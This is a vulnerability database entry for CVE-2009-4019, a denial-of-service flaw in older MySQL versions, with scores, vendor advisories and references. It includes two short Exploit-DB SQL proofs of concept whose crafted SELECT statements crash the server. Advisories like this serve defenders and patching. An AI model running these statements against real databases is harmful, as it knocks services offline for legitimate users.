CVE-2009-4019
Published 2009-11-30
CVE-2009-4019: mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries…
Priority P4 · 23 · medium · 4 · CVSS 2.0
AV:N/AC:L/Au:S/C:N/I:N/A:P
EXPLOIT
EPSS: 16.26% (96.6th percentile)
mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
Affected
81 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mysql | mysql | — | — |
CVSS provenance
nvd · v2.0 · 4.0 · MEDIUM · AV:N/AC:L/Au:S/C:N/I:N/A:P
vendor_ubuntu · 4.6 · MEDIUM
vendor_redhat · 4.0 · MEDIUM
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2012-03-12
CVE-2007-5925 MySQL vulnerabilities
Title: MySQL vulnerabilities
Summary: Several security issues were fixed in MySQL.
Multiple security issues were discovered in MySQL and this update includes
new upstream MySQL versions to fix these issues.
MySQL has been updated to 5.1.61 in Ubuntu 10.04 LTS, Ubuntu 10.10,
Ubuntu 11.04 and Ubuntu 11.10. Ubuntu 8.04 LTS has been updated to
MySQL 5.0.95.
In addition to security fixes, the updated packages contain bug fixes, new
features, and possibly incompatible changes.
Please see the following for more information:
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html
http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html
http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
Instructions: In general, a standard system update will make all the necessary changes.
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2010-02-10·CVSS 4.6
CVE-2008-7247 [MEDIUM] MySQL vulnerabilities
Title: MySQL vulnerabilities
Summary: MySQL vulnerabilities
It was discovered that MySQL could be made to overwrite existing table
files in the data directory. An authenticated user could use the DATA
DIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks.
This update alters table creation behaviour by disallowing the use of the
MySQL data directory in DATA DIRECTORY and INDEX DIRECTORY options. This
issue only affected Ubuntu 8.10. (CVE-2008-4098)
It was discovered that MySQL contained a cross-site scripting vulnerability
in the command-line client when the --html option is enabled. An attacker
could place arbitrary web script or html in a database cell, which would
then get placed in the html document output by the command-line tool. This
issue only affected Ubuntu
Red Hat
mysql: DoS (crash) when comparing GIS items from subquery and when handling subqueries in WHERE and assigning a SELECT result to a @variable
vendor_redhat·2009-11-04·CVSS 4.0
CVE-2009-4019 [MEDIUM] mysql: DoS (crash) when comparing GIS items from subquery and when handling subqueries in WHERE and assigning a SELECT result to a @variable
mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
GHSA
GHSA-pvv2-gf98-5mv3: mysqld in MySQL 5
ghsa_unreviewed·2022-05-02
CVE-2009-4019 [MEDIUM] GHSA-pvv2-gf98-5mv3: mysqld in MySQL 5
mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
No detection rules found.
Exploit-DB
MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service
exploitdb·2009-11-23
CVE-2009-4019 MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service
---
source: https://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
```sql
drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select 1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`)
row((select 1 from `t1` where 1=2),(select 1 from `t1`))
into @`var0`;
```
Exploit-DB
MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service
exploitdb·2009-11-23
CVE-2009-4019 MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service
---
source: https://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
```sql
drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where
`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);
```
http://bugs.mysql.com/47780
http://bugs.mysql.com/48291
http://dev.mysql.com/doc/refman/5.0/en/news-5-0-88.html
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html
http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html
http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html
http://marc.info/?l=oss-security&m=125881733826437&w=2
http://marc.info/?l=oss-security&m=125883754215621&w=2
http://marc.info/?l=oss-security&m=125901161824278&w=2
http://secunia.com/advisories/37717
http://secunia.com/advisories/38517
http://secunia.com/advisories/38573
http://support.apple.com/kb/HT4077
http://ubuntu.com/usn/usn-897-1
http://www.debian.org/security/2010/dsa-1997
http://www.redhat.com/support/errata/RHSA-2010-0109.html
http://www.ubuntu.com/usn/USN-1397-1
http://www.vupen.com/english/advisories/2010/1107
https://bugzilla.redhat.com/show_bug.cgi?id=540906
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11349
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8500
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00764.html
Published: 2009-11-30